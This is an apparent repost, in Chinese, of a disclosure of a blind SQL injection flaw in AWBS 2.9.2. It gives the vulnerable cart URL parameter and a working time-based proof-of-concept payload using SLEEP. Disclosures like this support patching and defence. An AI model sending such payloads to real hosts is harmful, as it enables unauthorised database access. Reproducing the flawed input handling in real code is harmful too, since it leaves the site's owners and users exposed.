影响版本:AWBS 2.9.2
官方网站:http://www.awbs.com
漏洞类型:SQL注入
漏洞描述:
---Vulnerability---
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
=============================================================================================
---PoC Using Time-Based Blind SQL Injection---
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
最后
以上就是专一鸡翅最近收集整理的关于AWBS 2.9.2 Blind SQL 注入0day的全部内容,更多相关AWBS内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复